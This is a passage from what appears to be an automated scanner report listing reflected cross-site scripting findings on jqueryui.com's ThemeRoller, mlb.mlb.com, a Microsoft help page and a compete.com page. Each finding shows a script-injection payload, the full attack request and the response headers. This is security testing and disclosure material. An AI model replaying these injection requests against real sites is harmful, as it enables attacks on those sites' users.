olorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c86ff"><script>alert(1)</script>44c93a3107d was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFFc86ff"><script>alert(1)</script>44c93a3107d&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:47 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 803b3"><script>alert(1)</script>16217d3125f was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000803b3"><script>alert(1)</script>16217d3125f&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:53:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da533"><script>alert(1)</script>98ab798f7d6 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFFda533"><script>alert(1)</script>98ab798f7d6&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10a11"><script>alert(1)</script>f172063c345 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B1000010a11"><script>alert(1)</script>f172063c345&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:53:50 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88141"><script>alert(1)</script>d9f5706c1f3 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF88141"><script>alert(1)</script>d9f5706c1f3&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:55 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
<meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" /> <meta nam ...[SNIP]... erColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF88141"><script>alert(1)</script>d9f5706c1f3&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_so ...[SNIP]...
2.77. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://jqueryui.com
Path: /themeroller/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c01bb"><script>alert(1)</script>9b3eca5e28b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?c01bb"><script>alert(1)</script>9b3eca5e28b=1 HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:51:18 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 117121
The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7177c"><script>alert(1)</script>9758f4953a3 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px7177c"><script>alert(1)</script>9758f4953a3&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:54:09 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5167"><script>alert(1)</script>0387f9320ec was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2pxb5167"><script>alert(1)</script>0387f9320ec&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:54:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cd2d"><script>alert(1)</script>4975e57d1e5 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=356cd2d"><script>alert(1)</script>4975e57d1e5&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:54:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 627d6"><script>alert(1)</script>c245b5368fc was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100627d6"><script>alert(1)</script>c245b5368fc&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:54:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a5b8"><script>alert(1)</script>939b7359cb6 was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px9a5b8"><script>alert(1)</script>939b7359cb6&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:54:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
2.83. http://mlb.mlb.com/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mlb.mlb.com
Path: /index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3b08"><script>alert(1)</script>b44d30a1246 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.jsp?c3b08"><script>alert(1)</script>b44d30a1246=1 HTTP/1.1
Host: mlb.mlb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=600
Expires: Sat, 20 Nov 2010 18:06:26 GMT
Date: Sat, 20 Nov 2010 17:56:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131968
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http:/ ...[SNIP]... <meta property="og:url" content="http://mlb.mlb.com/index.jsp?c3b08"><script>alert(1)</script>b44d30a1246=1&tcid=fb_share" /> ...[SNIP]...
2.84. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://onlinehelp.microsoft.com
Path: /en-US/bing/ff808535.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a64c2"><script>alert(1)</script>740e1573786 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-US/bing/ff808535.aspx?a64c2"><script>alert(1)</script>740e1573786=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAABNBgAAM19VJr1F78JLHJiR+JO+Sw!!&M=1; domain=.microsoft.com; expires=Tue, 20-Nov-2040 17:56:36 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Tue, 20-Nov-2040 17:56:36 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 20 Nov 2010 17:56:35 GMT
Content-Length: 43681
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bff31<a%20b%3dc>ace790abb9 was submitted in the REST URL parameter 1. This input was echoed as bff31<a b=c>ace790abb9 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /DOMAINbff31<a%20b%3dc>ace790abb9/ HTTP/1.1
Host: siteanalytics.compete.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
